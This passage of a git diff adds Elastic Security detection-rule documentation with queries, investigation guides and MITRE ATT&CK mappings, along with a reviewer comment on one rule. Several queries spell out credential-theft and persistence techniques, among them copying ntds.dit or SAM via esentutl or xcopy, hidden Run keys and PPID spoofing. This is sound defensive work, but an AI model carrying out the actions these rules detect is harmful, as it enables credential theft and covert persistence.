not cidrmatch(destination.ip, + "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", "192.0.0.0/29", "192.0.0.8/32", + "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", + "192.52.193.0/24", "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", + "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", "FE80::/10", "FF00::/8")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ 
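Review bot: In prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc the two repeated `(process.name : "expand.exe" or process.name : "extrac32.exe" or process.name : "ieexec.exe" or process.name : "makecab.exe")` predicates can be written once each as `process.name : ("expand.exe", "extrac32.exe", "ieexec.exe", "makecab.exe")`, the list form the sibling regsvr32 rule already uses, which keeps the two sequence stages from drifting apart when the list is edited. Two smaller points in the investigation guide: the sentence "Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation" needs a comma after "masquerading", and the "Retrieve Services Running on User Accounts" osquery filter uses `user_account == null`, which is not a null test in SQL (a comparison with NULL yields NULL); `user_account IS NULL` states the intent, even though NULL propagation through the surrounding `NOT (...)` happens to exclude those rows today.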
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc new file mode 100644 index 0000000000..0a7d0e8bf0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc 
@@ -0,0 +1,92 @@ +[[prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell]] +=== New ActiveSyncAllowedDeviceID Added via PowerShell + +Identifies the use of the Exchange PowerShell cmdlet, Set-CASMailbox, to add a new ActiveSync allowed device. Adversaries may target user email to collect sensitive information. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ +* https://docs.microsoft.com/en-us/powershell/module/exchange/set-casmailbox?view=exchange-ps + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name: ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and process.args : "Set-CASMailbox*ActiveSyncAllowedDeviceIDs*" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Email Delegate Permissions +** ID: T1098.002 +** Reference 
URL: https://attack.mitre.org/techniques/T1098/002/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc new file mode 100644 index 0000000000..bdb2090b74 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc 
@@ -0,0 +1,94 @@ +[[prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process]] +=== New Systemd Service Created by Previously Unknown Process + +Systemd service files are configuration files in Linux systems used to define and manage system services. Malicious actors can leverage systemd service files to achieve persistence by creating or modifying service files to execute malicious commands or payloads during system startup. This allows them to maintain unauthorized access, execute additional malicious activities, or evade detection. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://opensource.com/article/20/7/systemd-timers +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.action:("creation" or "file_create_event") and file.path:( + /etc/systemd/system/* or + /usr/local/lib/systemd/system/* or + /lib/systemd/system/* or + /usr/lib/systemd/system/* or + /home/*/.config/systemd/user/* +) and +not ( + process.name:( + "dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "dnf-automatic" or python* or "puppetd" or + "elastic-agent" or "cinc-client" or "chef-client" or "pacman" or "puppet" or "cloudflared" + ) or + file.extension:("swp" or "swpx") +) + 
+---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Systemd Service +** ID: T1543.002 +** Reference URL: https://attack.mitre.org/techniques/T1543/002/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Sub-technique: +** Name: Systemd Service +** ID: T1543.002 +** Reference URL: https://attack.mitre.org/techniques/T1543/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc new file mode 100644 index 0000000000..a352cd620e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc 
@@ -0,0 +1,140 @@ +[[prebuilt-rule-8-10-5-new-systemd-timer-created]] +=== New Systemd Timer Created + +Detects the creation of a systemd timer within any of the default systemd timer directories. Systemd timers can be used by an attacker to gain persistence, by scheduling the execution of a command or script. Similarly to cron/at, systemd timers can be set up to execute on boot time, or on a specific point in time, which allows attackers to regain access in case the connection to the infected asset was lost. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://opensource.com/article/20/7/systemd-timers +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating New Systemd Timer Created + +Systemd timers are used for scheduling and automating recurring tasks or services on Linux systems. + +Attackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. + +This rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism. 
+ +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. + +#### Possible Investigation Steps + +- Investigate the timer file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`. +- Search for the systemd service file named similarly to the timer that was created. +- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery. 
+ - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (\npath LIKE '/etc/systemd/system/%' OR \npath LIKE '/usr/local/lib/systemd/system/%' OR \npath LIKE '/lib/systemd/system/%' OR\npath LIKE '/usr/lib/systemd/system/%' OR\npath LIKE '/home/user/.config/systemd/user/%'\n)\n"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (\npath LIKE '/etc/systemd/system/%' OR \npath LIKE '/usr/local/lib/systemd/system/%' OR \npath LIKE '/lib/systemd/system/%' OR\npath LIKE '/usr/lib/systemd/system/%' OR\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\n)\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. 
+ - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False Positive Analysis + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. 
+- Delete the service/timer or restore its original configuration. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.action : ("creation" or "file_create_event") and file.extension : "timer" and +file.path : (/etc/systemd/system/* or /usr/local/lib/systemd/system/* or /lib/systemd/system/* or +/usr/lib/systemd/system/* or /home/*/.config/systemd/user/*) and not process.name : ( + "docker" or "dockerd" or "dnf" or "yum" or "rpm" or "dpkg" or "executor" or "cloudflared" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Systemd Timers +** ID: T1053.006 +** Reference URL: https://attack.mitre.org/techniques/T1053/006/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc new file mode 100644 index 0000000000..852c5a9603 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nping-process-activity.asciidoc 
@@ -0,0 +1,64 @@ +[[prebuilt-rule-8-10-5-nping-process-activity]] +=== Nping Process Activity + +Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://en.wikipedia.org/wiki/Nmap + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and process.name == "nping" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc new file mode 100644 index 0000000000..3022d88c0f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc 
@@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied]] +=== NTDS or SAM Database File Copied + +Identifies a copy operation of the Active Directory Domain Database (ntds.dit) or Security Account Manager (SAM) files. Those files contain sensitive information including hashed domain and/or local credentials. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: + +* https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ +* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + ( + (process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE", "XCOPY.EXE") and + process.args : ("copy", "xcopy", "Copy-Item", "move", "cp", "mv") + ) or + (process.pe.original_file_name : "esentutl.exe" and process.args : ("*/y*", "*/vss*", "*/d*")) + ) and + process.args : ("*\\ntds.dit", "*\\config\\SAM", "\\*\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy*\\*", "*/system32/config/SAM*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* 
Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc new file mode 100644 index 0000000000..c6a953e45b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc 
@@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-nullsessionpipe-registry-modification]] +=== NullSessionPipe Registry Modification + +Identifies NullSessionPipe registry modifications that specify which pipes can be accessed anonymously. This could be indicative of adversary lateral movement preparation by making the added pipe available to everyone. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/ +* https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.type in ("creation", "change") and +registry.path : ( + "HKLM\\SYSTEM\\*ControlSet*\\services\\LanmanServer\\Parameters\\NullSessionPipes", + "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\services\\LanmanServer\\Parameters\\NullSessionPipes" +) and length(registry.data.strings) > 0 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** 
Reference URL: https://attack.mitre.org/techniques/T1021/002/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc new file mode 100644 index 0000000000..e34bc7bf04 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc 
@@ -0,0 +1,78 @@ +[[prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell]] +=== Outbound Scheduled Task Activity via PowerShell + +Identifies the PowerShell process loading the Task Scheduler COM DLL followed by an outbound RPC network connection within a short time period. This may indicate lateral movement or remote discovery via scheduled tasks. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id with maxspan = 5s + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : "taskschd.dll" or file.name : "taskschd.dll") and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe")] + [network where host.os.type == "windows" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and destination.port == 135 and not destination.address in ("127.0.0.1", "::1")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: 
Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc new file mode 100644 index 0000000000..2c704ee347 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc 
@@ -0,0 +1,116 @@ +[[prebuilt-rule-8-10-5-parent-process-pid-spoofing]] +=== Parent Process PID Spoofing + +Identifies parent process spoofing used to thwart detection. Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.didierstevens.com/2017/03/20/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Privilege Escalation +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +/* This rule is compatible with Elastic Endpoint only */ + +sequence by host.id, user.id with maxspan=3m + + [process where host.os.type == "windows" and event.type == "start" and + process.Ext.token.integrity_level_name != "system" and + ( + process.pe.original_file_name : ("winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe", "eqnedt32.exe", + "fltldr.exe", "mspub.exe", "msaccess.exe", "powershell.exe", "pwsh.exe", + "cscript.exe", "wscript.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe", + "mshta.exe", "wmic.exe", "cmstp.exe", "msxsl.exe") or + + (process.executable : ("?:\\Users\\*.exe", + "?:\\ProgramData\\*.exe", + "?:\\Windows\\Temp\\*.exe", + "?:\\Windows\\Tasks\\*") and + (process.code_signature.exists == false or process.code_signature.status : "errorBadDigest")) or + + process.executable : "?:\\Windows\\Microsoft.NET\\*.exe" + ) and + + not process.executable : + ("?:\\Windows\\System32\\WerFaultSecure.exe", + 
"?:\\WINDOWS\\SysWOW64\\WerFaultSecure.exe", + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe") + ] by process.pid + [process where host.os.type == "windows" and event.type == "start" and + process.parent.Ext.real.pid > 0 and + + /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */ + not (process.name : "msedge.exe" and process.parent.name : "sihost.exe") and + + not process.executable : + ("?:\\Windows\\System32\\WerFaultSecure.exe", + "?:\\WINDOWS\\SysWOW64\\WerFaultSecure.exe", + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe") + ] by process.parent.Ext.real.pid + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ +* Sub-technique: +** Name: Parent PID Spoofing +** ID: T1134.004 +** Reference URL: https://attack.mitre.org/techniques/T1134/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ +* Sub-technique: +** Name: Parent PID Spoofing +** ID: T1134.004 +** Reference URL: https://attack.mitre.org/techniques/T1134/004/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc new file mode 100644 index 0000000000..62f4db6efb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc 
@@ -0,0 +1,109 @@ +[[prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected]] +=== Persistence via Hidden Run Key Detected + +Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit). + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/outflanknl/SharpHide +* https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +/* Registry Path ends with backslash */ +registry where host.os.type == "windows" and /* length(registry.data.strings) > 0 and */ + registry.path : ("HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\", + "HKEY_USERS\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + "HKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", + 
